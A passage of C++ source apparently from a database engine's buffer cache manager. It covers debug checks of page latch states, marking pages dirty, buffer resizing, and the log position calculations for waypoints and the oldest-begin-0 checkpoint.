( errBF != errBFIPageNotVerified ) ); // and page NOT been used (i.e. no one has latched since read)
}
#ifdef DEBUG
BOOL FBFReadLatched( const BFLatch* pbfl )
{
return FBFICacheValidPv( pbfl->pv ) &&
FBFILatchValidContext( pbfl->dwContext ) &&
pbfl->pv == PbfBFILatchContext( pbfl->dwContext )->pv &&
PsxwlBFILatchContext( pbfl->dwContext )->FOwnSharedLatch() &&
FBFCurrentLatch( pbfl );
}
BOOL FBFNotReadLatched( const BFLatch* pbfl )
{
return !FBFICacheValidPv( pbfl->pv ) ||
!FBFILatchValidContext( pbfl->dwContext ) ||
pbfl->pv != PbfBFILatchContext( pbfl->dwContext )->pv ||
PsxwlBFILatchContext( pbfl->dwContext )->FNotOwnSharedLatch();
}
BOOL FBFReadLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fReadLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is Read Latched if it is present in the hash table and
// the associated BF or one of its hashed latches is share latched by us
fReadLatched = errHash == BFHash::ERR::errSuccess;
if ( fReadLatched )
{
fReadLatched = ( pgnopbf.pbf->sxwl.FOwnSharedLatch() &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) );
const size_t iHashedLatch = pgnopbf.pbf->iHashedLatch;
if ( iHashedLatch < cBFHashedLatch )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fReadLatched = fReadLatched ||
( pbfhl->sxwl.FOwnSharedLatch() &&
pbfhl->pbf == pgnopbf.pbf &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) );
}
}
}
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fReadLatched;
}
BOOL FBFNotReadLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fNotReadLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is not Read Latched if it is not present in the hash
// table or the associated BF and any of its hashed latches are not share
// latched by us
fNotReadLatched = errHash == BFHash::ERR::errEntryNotFound;
if ( !fNotReadLatched )
{
fNotReadLatched = pgnopbf.pbf->sxwl.FNotOwnSharedLatch();
const size_t iHashedLatch = pgnopbf.pbf->iHashedLatch;
if ( iHashedLatch < cBFHashedLatch )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fNotReadLatched = fNotReadLatched && ( pbfhl->sxwl.FNotOwnSharedLatch() || pbfhl->pbf != pgnopbf.pbf );
}
}
}
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fNotReadLatched;
}
BOOL FBFRDWLatched( const BFLatch* pbfl )
{
return FBFICacheValidPv( pbfl->pv ) &&
FBFILatchValidContext( pbfl->dwContext ) &&
FBFICacheValidPbf( PBF( pbfl->dwContext ) ) &&
pbfl->pv == PBF( pbfl->dwContext )->pv &&
!PBF( pbfl->dwContext )->fWARLatch &&
PBF( pbfl->dwContext )->sxwl.FOwnExclusiveLatch() &&
FBFCurrentLatch( pbfl ) &&
FBFUpdatableLatch( pbfl );
}
BOOL FBFNotRDWLatched( const BFLatch* pbfl )
{
return !FBFICacheValidPv( pbfl->pv ) ||
!FBFILatchValidContext( pbfl->dwContext ) ||
!FBFICacheValidPbf( PBF( pbfl->dwContext ) ) ||
pbfl->pv != PBF( pbfl->dwContext )->pv ||
PBF( pbfl->dwContext )->fWARLatch ||
PBF( pbfl->dwContext )->sxwl.FNotOwnExclusiveLatch();
}
BOOL FBFRDWLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fRDWLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is RDW Latched if it is present in the hash table and
// the associated BF is not marked as WAR Latched and the associated BF is
// not exclusively latched by us
fRDWLatched = errHash == BFHash::ERR::errSuccess &&
!pgnopbf.pbf->fWARLatch &&
pgnopbf.pbf->sxwl.FOwnExclusiveLatch() &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) &&
FBFIUpdatablePage( pgnopbf.pbf );
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fRDWLatched;
}
BOOL FBFNotRDWLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fNotRDWLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is not RDW Latched if it is not present in the hash
// table or the associated BF is marked as WAR Latched or the associated
// BF is not exclusively latched by us
fNotRDWLatched = errHash == BFHash::ERR::errEntryNotFound ||
pgnopbf.pbf->fWARLatch ||
pgnopbf.pbf->sxwl.FNotOwnExclusiveLatch();
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fNotRDWLatched;
}
BOOL FBFWARLatched( const BFLatch* pbfl )
{
return FBFICacheValidPv( pbfl->pv ) &&
FBFILatchValidContext( pbfl->dwContext ) &&
FBFICacheValidPbf( PBF( pbfl->dwContext ) ) &&
pbfl->pv == PBF( pbfl->dwContext )->pv &&
PBF( pbfl->dwContext )->fWARLatch &&
PBF( pbfl->dwContext )->sxwl.FOwnExclusiveLatch() &&
FBFCurrentLatch( pbfl ) &&
FBFUpdatableLatch( pbfl );
}
BOOL FBFNotWARLatched( const BFLatch* pbfl )
{
return !FBFICacheValidPv( pbfl->pv ) ||
!FBFILatchValidContext( pbfl->dwContext ) ||
!FBFICacheValidPbf( PBF( pbfl->dwContext ) ) ||
pbfl->pv != PBF( pbfl->dwContext )->pv ||
!PBF( pbfl->dwContext )->fWARLatch ||
PBF( pbfl->dwContext )->sxwl.FNotOwnExclusiveLatch();
}
BOOL FBFWARLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fWARLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is WAR Latched if it is present in the hash table and
// the associated BF is marked as WAR Latched and the associated BF is not
// exclusively latched by us
fWARLatched = errHash == BFHash::ERR::errSuccess &&
pgnopbf.pbf->fWARLatch &&
pgnopbf.pbf->sxwl.FOwnExclusiveLatch() &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) &&
FBFIUpdatablePage( pgnopbf.pbf );
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fWARLatched;
}
BOOL FBFNotWARLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fNotWARLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is not WAR Latched if it is not present in the hash
// table or the associated BF is not marked as WAR Latched or the associated
// BF is not exclusively latched by us
fNotWARLatched = errHash == BFHash::ERR::errEntryNotFound ||
!pgnopbf.pbf->fWARLatch ||
pgnopbf.pbf->sxwl.FNotOwnExclusiveLatch();
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fNotWARLatched;
}
BOOL FBFWriteLatched( const BFLatch* pbfl )
{
BOOL fWriteLatched;
fWriteLatched = FBFICacheValidPv( pbfl->pv ) &&
FBFILatchValidContext( pbfl->dwContext ) &&
FBFICacheValidPbf( PBF( pbfl->dwContext ) ) &&
pbfl->pv == PBF( pbfl->dwContext )->pv &&
PBF( pbfl->dwContext )->sxwl.FOwnWriteLatch() &&
FBFCurrentLatch( pbfl ) &&
FBFUpdatableLatch( pbfl );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( fWriteLatched && PBF( pbfl->dwContext )->bfls == bflsHashed )
{
const size_t iHashedLatch = PBF( pbfl->dwContext )->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fWriteLatched = fWriteLatched && pbfhl->sxwl.FOwnWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
return fWriteLatched;
}
BOOL FBFNotWriteLatched( const BFLatch* pbfl )
{
BOOL fNotWriteLatched;
fNotWriteLatched = !FBFICacheValidPv( pbfl->pv ) ||
!FBFILatchValidContext( pbfl->dwContext ) ||
!FBFICacheValidPbf( PBF( pbfl->dwContext ) ) ||
pbfl->pv != PBF( pbfl->dwContext )->pv ||
PBF( pbfl->dwContext )->sxwl.FNotOwnWriteLatch();
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( !fNotWriteLatched && PBF( pbfl->dwContext )->bfls == bflsHashed )
{
const size_t iHashedLatch = PBF( pbfl->dwContext )->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fNotWriteLatched = fNotWriteLatched || pbfhl->sxwl.FNotOwnWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
return fNotWriteLatched;
}
BOOL FBFWriteLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fWriteLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is Write Latched if it is present in the hash table and
// the associated BF and all its hashed latches are write latched by us
fWriteLatched = errHash == BFHash::ERR::errSuccess &&
pgnopbf.pbf->sxwl.FOwnWriteLatch() &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) &&
FBFIUpdatablePage( pgnopbf.pbf );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( fWriteLatched && pgnopbf.pbf->bfls == bflsHashed )
{
const size_t iHashedLatch = pgnopbf.pbf->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fWriteLatched = fWriteLatched && pbfhl->sxwl.FOwnWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fWriteLatched;
}
BOOL FBFNotWriteLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fNotWriteLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is not Write Latched if it is not present in the hash
// table or the associated BF and all of its hashed latches are not write
// latched by us
fNotWriteLatched = errHash == BFHash::ERR::errEntryNotFound ||
pgnopbf.pbf->sxwl.FNotOwnWriteLatch();
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( !fNotWriteLatched && pgnopbf.pbf->bfls == bflsHashed )
{
const size_t iHashedLatch = pgnopbf.pbf->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fNotWriteLatched = fNotWriteLatched || pbfhl->sxwl.FNotOwnWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fNotWriteLatched;
}
BOOL FBFLatched( const BFLatch* pbfl )
{
return FBFReadLatched( pbfl ) ||
FBFRDWLatched( pbfl ) ||
FBFWARLatched( pbfl ) ||
FBFWriteLatched( pbfl );
}
BOOL FBFNotLatched( const BFLatch* pbfl )
{
return FBFNotReadLatched( pbfl ) &&
FBFNotRDWLatched( pbfl ) &&
FBFNotWARLatched( pbfl ) &&
FBFNotWriteLatched( pbfl );
}
BOOL FBFLatched( IFMP ifmp, PGNO pgno )
{
return FBFReadLatched( ifmp, pgno ) ||
FBFRDWLatched( ifmp, pgno ) ||
FBFWARLatched( ifmp, pgno ) ||
FBFWriteLatched( ifmp, pgno );
}
BOOL FBFNotLatched( IFMP ifmp, PGNO pgno )
{
return FBFNotReadLatched( ifmp, pgno ) &&
FBFNotRDWLatched( ifmp, pgno ) &&
FBFNotWARLatched( ifmp, pgno ) &&
FBFNotWriteLatched( ifmp, pgno );
}
// Check the BFLatch has the most current version of the page
// Note: This version checks for the most truthiness.
BOOL FBFCurrentLatch( const BFLatch* pbfl, IFMP ifmp, PGNO pgno )
{
return FBFICurrentPage( PbfBFILatchContext( pbfl->dwContext ), ifmp, pgno );
}
BOOL FBFCurrentLatch( const BFLatch* pbfl )
{
const PBF pbf = PbfBFILatchContext( pbfl->dwContext );
return FBFCurrentLatch( pbfl, pbf->ifmp, pbf->pgno );
}
// Check the BFLatch has the a updateable version of the page
BOOL FBFUpdatableLatch( const BFLatch* pbfl )
{
// would not make sense to call this external latch function on a non-current page
Assert( FBFCurrentLatch( pbfl ) );
return FBFIUpdatablePage( PbfBFILatchContext( pbfl->dwContext ) );
}
#endif // DEBUG
DWORD_PTR BFGetLatchHint( const BFLatch* pbfl )
{
// validate IN args
Assert( FBFLatched( pbfl ) );
// return a pointer to the latched BF as the stable latch hint
return (DWORD_PTR)PbfBFILatchContext( pbfl->dwContext );
}
////////////////
// Page State
// These functions are used to control and query the state of a page (or
// pages) in the buffer cache.
// Retrieves the ERR state from the latch (which is presumably set there
// by an IO operation or page validation).
ERR ErrBFLatchStatus( const BFLatch * pbfl )
{
Assert( FBFRDWLatched( pbfl ) || FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Expected( FBFRDWLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Expected( PBF( pbfl->dwContext )->err != JET_errOutOfMemory &&
PBF( pbfl->dwContext )->err != JET_errOutOfBuffers );
return PBF( pbfl->dwContext )->err;
}
// Clears the error state of the buffer and rehydrates it to full size in preparation
// for the page to be used / new'd.
void BFInitialize( BFLatch* pbfl, const TraceContext& tc )
{
Assert( FBFWriteLatched( pbfl ) );
const PBF pbf = PbfBFILatchContext( pbfl->dwContext );
BFIInitialize( pbf, tc );
}
// Marks the given WAR Latched or Write Latched page as dirty. This means
// that the given buffer for this page contains changes that should be written
// to disk. The degree of dirtiness is specified by the given dirty flags.
// A page can only be made more dirty. Trying to make a page less dirty than
// it currently is will have no effect.
void BFDirty( const BFLatch* pbfl, BFDirtyFlags bfdf, const TraceContext& tc )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
if ( bfdf >= bfdfDirty )
{
// Reason for this restriction is documented in BFSetLgposModify() under
// the "WAR Latches and Logged Operations" comment. Also if you look in
// BFIDirtyPage() you will find code for resetting the OB0 that wouldn't
// work properly if we set the OB0 lgpos with a WAR latch.
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFNotWARLatched( pbfl ) );
}
const PBF pbf = PBF( pbfl->dwContext );
// This page has been updated and is going to be written to disk. This invalidates
// all outstanding patch requests
if ( BoolParam( PinstFromIfmp( pbf->ifmp ), JET_paramEnableExternalAutoHealing ) )
{
Assert( FBFWARLatched( pbf->ifmp, pbf->pgno ) || FBFWriteLatched( pbf->ifmp, pbf->pgno ) );
PagePatching::CancelPatchRequest( pbf->ifmp, pbf->pgno );
}
// dirty the BF
BFIDirtyPage( pbf, bfdf, tc );
}
// Returns the current dirtiness of the given latched page.
BFDirtyFlags FBFDirty( const BFLatch* pbfl )
{
// validate IN args
Assert( FBFLatched( pbfl ) );
// get the dirty flag for the page
return BFDirtyFlags( PBF( pbfl->dwContext )->bfdf );
}
// Returns the native buffer size the buffer manager can support given the
// requested size.
LONG CbBFGetBufferSize( const LONG cbReqSize )
{
ICBPage icbNewSize = max( icbPage4KB, IcbBFIBufferSize( cbReqSize ) );
Assert( CbBFISize( icbNewSize ) >= cbReqSize );
return CbBFISize( icbNewSize );
}
// Returns the current buffer size backing the given latched page.
// NOTE: buffer size may be dehydrated and thus different than CbBFPageSize().
LONG CbBFBufferSize( const BFLatch* pbfl )
{
// validate IN args
// get buffer size of this paticular buffer
return CbBFIBufferSize( PBF( pbfl->dwContext ) );
}
// Returns the page size of the given latched page.
LONG CbBFPageSize( const BFLatch* pbfl )
{
// validate IN args
// get page size of this paticular buffer
return CbBFIPageSize( PBF( pbfl->dwContext ) );
}
// Changes the size of the buffer underlying the provided latch.
// It is expected the user has the w-latch.
// if shrinking ( cbNewSize < CbBFBufferSize() ), make sure all data you want is
// removed from the tail end of the buffer.
// if growing ( cbNewSize > CbBFBufferSize() ), the new buffer will be allocated /
// extended and referencable at the end of the call.
void BFSetBufferSize( __inout BFLatch* pbfl, __in const INT cbNewSize )
{
Assert( FBFWriteLatched( pbfl ) );
Assert( CbBFISize( IcbBFIBufferSize( cbNewSize ) ) == cbNewSize );
CallS( ErrBFISetBufferSize( (PBF)pbfl->dwContext, IcbBFIBufferSize( cbNewSize ), fTrue ) );
}
////////////////////////
// Logging / Recovery
// The following functions are provided for logging / recovery support.
//
// (diagram assumes fixed width)
//
// dbhdr.le_lGenMinRequired dbhdr.le_lGenMaxRequired dbhdr.le_lGenCommitted[1] or "log tip"
// and checkpoint (edb.jcp) aka waypoint (normally) plog->LgposLGLogTipNoLock()
// | | |
// | | | unflushed log buffers
// | updated & possibly* | | |
// updated & flushed | flushed | updated & unflushed | | | future log writes ->
// -------------------------|-------------------------|------------------------|ooo| - - - - - - - - - - - -
//
// ---|---------------|---------------|---------------|---------------|---------xxxxxx|
// | edb0002E.jtx | edb0002F.jtx | edb00030.jtx | edb00031.jtx | edb.jtx |
//
// --- - log records (page references) committed / flushed to the disk / transaction log.
// ooo - log records (page references) not yet flushed / committed to disk.
// xxx - pattern filled log
//
// * by possibly we mean, some pages are flushed to disk from the buffer manager and
// some are unflushed.
//
// Note: Win2k3 / e2k3 and before did not have the waypoint, and the le_lGenMaxRequired
// was effectively the same as the log tip.
// The modify log position for each buffer is used to prevent a dirty
// buffer from being flushed to disk before the changes in it can be logged
// (under the Write Ahead Logging paradigm) or to prevent flushing of
// changes that are inhibited due to waypoint latency policy.
// The Begin 0 log position for each buffer indicates the oldest transaction
// that has made a modification to that buffer. This is used in computing
// the Oldest Begin 0 log position, which indicates the oldest transaction
// that still has unsaved changes in the buffer cache. This log position is
// used to compute the current checkpoint depth.
// NOTE: The waypoint is a per FMP / database concept whereas the checkpoint
// and log gen committed are maintained across all databases attached to a
// given log.
//
void BFGetBestPossibleWaypoint(
__in IFMP ifmp,
__in const LONG lgenCommitted,
__out LGPOS * plgposBestWaypoint )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
LOG * plog = PinstFromIfmp( ifmp )->m_plog;
LGPOS lgposCurrentWaypoint;
Assert( plgposBestWaypoint );
Assert( plog && pfmp );
// we read current, then best possible waypoint / log tip, in this order.
// This is critical for BFIMaintWaypointRequest() to work.
// Grab the current waypoint.
lgposCurrentWaypoint = pfmp->LgposWaypoint();
// Make sure we do the right thing for non-logged databases ...
if ( plog->FLogDisabled() || !pfmp->FLogOn() )
{
Assert( CmpLgpos( lgposCurrentWaypoint, lgposMin ) == 0 );
*plgposBestWaypoint = lgposMin;
return;
}
// Grab the tip of the flushed log
LGPOS lgposPreferredWaypoint;
if ( plog->FRecovering() && fRecoveringRedo == plog->FRecoveringMode() )
{
// on recovery-redo, must obtain the generation from
// m_lgposRedo, because in some error cases, m_plgfilehdr
// actually points to edb.log, which may not be the last log
// we played up to; for instance, if we've replayed up to
// generation 20, but generation 21 is missing, we'll open
// edb.log, and if it's not actually generation 21, we will
// eventually properly err out, but m_plgfilehdr will be left
// pointing at edb.log and the last checkpoint update before
// erring out will end up erroneously using it here; or as
// another example, if a newly-opened logfile (not necessarily
// edb.log) is determined to be corrupt, then m_plgfilehdr will
// be pointing to it, but m_lgposRedo will still be pointing to
// the previous logfile
//
lgposPreferredWaypoint.lGeneration = plog->LgposLGLogTipNoLock().lGeneration;
}
else if ( 0 != lgenCommitted )
{
// lgenCommitted should either point to the current log file,
// or it should point to the next log file (which we're in the
// midst of switching to)
//
// because we update db headers before copying
// m_plgfilehdrT to m_plgfilehdr, there is a chance that
// we end up calling this function with an lgenCommitted
// (which is obtained using m_plgfilehdr) that is stale by
// one generation, but fortunately, the MaxLgpos()
// calculation at the end of this function saves us
//
Assert( lgenCommitted == plog->LGGetCurrentFileGenNoLock()
|| lgenCommitted == plog->LGGetCurrentFileGenNoLock() + 1
|| lgenCommitted == plog->LGGetCurrentFileGenNoLock() - 1 );
lgposPreferredWaypoint.lGeneration = lgenCommitted;
}
else
{
lgposPreferredWaypoint.lGeneration = plog->LGGetCurrentFileGenWithLock();
}
// Set the isec/ib to the end, b/c we only support whole log jumps currently.
lgposPreferredWaypoint.isec = lgposMax.isec;
lgposPreferredWaypoint.ib = lgposMax.ib;
// calculate the best possible waypoint ...
if ( pfmp->FNoWaypointLatency() ||
PinstFromIfmp( ifmp )->m_fNoWaypointLatency )
{
//
// If we are in term | detach | recovery, the waypoing / max log req is the current log ...
// (do not yet support keeping the waypoint during these times)
//
; // nothing
}
else
{
//
// During normal operation, we subtract the specified waypoint depth ...
//
const LONG lWaypointDepth = (LONG)UlParam( PinstFromIfmp( ifmp ), JET_paramWaypointLatency );
if ( 0 < ( lgposPreferredWaypoint.lGeneration - lWaypointDepth ) )
{
lgposPreferredWaypoint.lGeneration = lgposPreferredWaypoint.lGeneration - lWaypointDepth;
}
else if ( CmpLgpos( &lgposCurrentWaypoint, &lgposMin ) != 0 )
{
// if subtracting the waypoint depth would make a negative waypoint, then let the waypoint
// sit at the current waypoint (likely lGen 1) until we move enough logs to calculate the waypoint right.
lgposPreferredWaypoint = lgposCurrentWaypoint;
}
}
//
// If we haven't flushed a log, it cannot be part of the waypoint.
// Note that we allow partially flushed log to be part of waypoint. Only way to fix that would be actually track
// the actual LGPOS of the waypoint in the db header le_lGenMaxRequired
//
LGPOS lgposFlushTip;
plog->LGFlushTip( &lgposFlushTip );
lgposPreferredWaypoint.lGeneration = min( lgposPreferredWaypoint.lGeneration, lgposFlushTip.lGeneration );
//
// We can't move the waypoint back!
//
// If the current waypoint has somehow gotten ahead of where we'd ideally like it, then we
// must maintain the waypoint at that level.
//
*plgposBestWaypoint = MaxLgpos( lgposCurrentWaypoint, lgposPreferredWaypoint );
}
void BFIMaintWaypointRequest(
__in IFMP ifmp )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
LGPOS lgposCurrentWaypoint;
LGPOS lgposBestWaypoint;
// we read current, then best possible waypoint / log tip, in this order.
lgposCurrentWaypoint = pfmp->LgposWaypoint();
BFGetBestPossibleWaypoint( ifmp, 0, &lgposBestWaypoint );
// Should never go backwards from the current waypoint.
Assert( CmpLgpos( lgposBestWaypoint, lgposCurrentWaypoint) >= 0 );
//
// Check if the waypoint was improved...
//
if ( CmpLgpos( lgposBestWaypoint, lgposCurrentWaypoint ) > 0 )
{
//
// Yeah, we can request a higher waypoint be established
//
// We should only be increasing the waypoint by a whole generation ...
Assert( lgposCurrentWaypoint.lGeneration < lgposBestWaypoint.lGeneration );
// We can't just update the pfmp->m_lgposWaypoint, we need to update the database
// header with this fact first. We use checkpoint maintenence to maintain all our log
// positions / references.
BFIMaintCheckpointRequest();
return;
}
//
// Ok, so we can't improve the waypoint.
//
return;
}
// Returns the log position of the oldest Begin Transaction at level 0 for
// any session that has modified any buffer in the cache. If no buffers
// have been modified, then this function will return lgposMax. This
// function is used to compute the current checkpoint depth.
void BFIGetLgposOldestBegin0( const IFMP ifmp, LGPOS * const plgpos, const BOOL fExternalLocking, LGPOS lgposOldestTrx = lgposMin )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
BFFMPContext* pbffmp = NULL;
if ( fExternalLocking )
{
// external locking indicates the caller, already has the appropriate locks
Assert( pfmp->FBFContextReader() ); // or could be writer, change if needed
pbffmp = (BFFMPContext*)pfmp->DwBFContext();
Assert( pbffmp );
Assert( pbffmp->fCurrentlyAttached ); // handled below, just in case
}
else
{
pfmp->EnterBFContextAsReader();
pbffmp = (BFFMPContext*)pfmp->DwBFContext();
}
// if no context is present, there must be no oldest begin 0
if ( !pbffmp || !pbffmp->fCurrentlyAttached )
{
*plgpos = lgposMax;
if ( !fExternalLocking )
{
pfmp->LeaveBFContextAsReader();
}
return;
}
// CONSIDER: should we delete any clean BFs we find during this process
// to increase the accuracy of this computation? if we land on a clean BF
// then we could return an artificially old checkpoint which could affect
// our crash recovery time. we defer the removal of clean BFs from this
// index so this is not a corner case
// find the first entry in the oldest begin 0 index
BFOB0::ERR errOB0;
BFOB0::CLock lockOB0;
pbffmp->bfob0.MoveBeforeFirst( &lockOB0 );
errOB0 = pbffmp->bfob0.ErrMoveNext( &lockOB0 );
// we found the first entry in the index
if ( errOB0 != BFOB0::ERR::errNoCurrentEntry )
{
// return the lgpos of this oldest entry rounded down to the next level
// of uncertainty in the index
PBF pbf;
errOB0 = pbffmp->bfob0.ErrRetrieveEntry( &lockOB0, &pbf );
Assert( errOB0 == BFOB0::ERR::errSuccess );
*plgpos = BFIOB0Lgpos( ifmp, pbf->lgposOldestBegin0 ); // factor in the OB0 uncertainty.
// if this entry points to a clean BF then request checkpoint depth
// maintenance to clean up the index
if ( pbf->bfdf == bfdfClean )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[ pbf->ifmp ], bfcpdmrRequestRemoveCleanEntries );
}
}
// we did not find the first entry in the index
else
{
// return lgposMax to indicate that there are no BFs with an Oldest
// Begin 0 dependency set
*plgpos = lgposMax;
}
// unlock the oldest begin 0 index
pbffmp->bfob0.UnlockKeyPtr( &lockOB0 );
// scan the Oldest Begin 0 Overflow List and collect the Oldest Begin 0
// from there as well
pbffmp->critbfob0ol.Enter();
for ( PBF pbf = pbffmp->bfob0ol.PrevMost(); pbf != pbfNil; pbf = pbffmp->bfob0ol.Next( pbf ) )
{
if ( CmpLgpos( plgpos, &pbf->lgposOldestBegin0 ) > 0 )
{
*plgpos = pbf->lgposOldestBegin0;
}
if ( pbf->bfdf == bfdfClean )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[ pbf->ifmp ], bfcpdmrRequestRemoveCleanEntries );
}
}
// cache the last value returned by this function
pbffmp->lgposOldestBegin0Last = *plgpos;
pbffmp->critbfob0ol.Leave();
if ( !fExternalLocking )
{
pfmp->LeaveBFContextAsReader();
}
#pragma prefast( suppress:6237, "When CONFIG OVERRIDE_INJECTION is off, UlConfigOverrideInjection() is a no-op." )
if ( (BOOL)UlConfigOverrideInjection( 50764, fFalse ) && CmpLgpos( lgposOldestTrx, lgposMin ) != 0 )
{
// scan through all initialized BFs looking for cached pages from this IFMP
// so that we can verify our OB0 computation
LGPOS lgposOldestBegin0Scan;
lgposOldestBegin0Scan = lgposMax;
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// BUGBUG: this is unsynchronized
// we cannot grab the latch because we will deadlock
// this BF contains a cached paged from this IFMP
if ( pbf->ifmp == ifmp )
{
// track the oldest lgposOldestBegin0 we find for this IFMP
if ( CmpLgpos( &lgposOldestBegin0Scan, &pbf->lgposOldestBegin0 ) > 0 )
{
lgposOldestBegin0Scan = pbf->lgposOldestBegin0;
}
}
}
// OB0 may have gone down since we got it from index, but not beyond oldest transaction (so use lower of
// the two values for comparison)
LGPOS lgposOldestBegin0Index = ( CmpLgpos( plgpos, &lgposOldestTrx ) < 0 ) ? *plgpos : lgposOldestTrx;
// the OB0 we found from the index had better be at least as old as the one we found while
// scanning the cache!
Enforce( CmpLgpos( &lgposOldestBegin0Index, &lgposOldestBegin0Scan ) <= 0 );
}
}
// Returns the log position of the oldest Begin Transaction at level 0 for
// any session that has modified any buffer in the cache. If no buffers
// have been modified, then this function will return lgposMax. This
// function is used to compute the current checkpoint depth.
void BFGetLgposOldestBegin0( IFMP ifmp, LGPOS * const plgpos, LGPOS lgposOldestTrx )
{
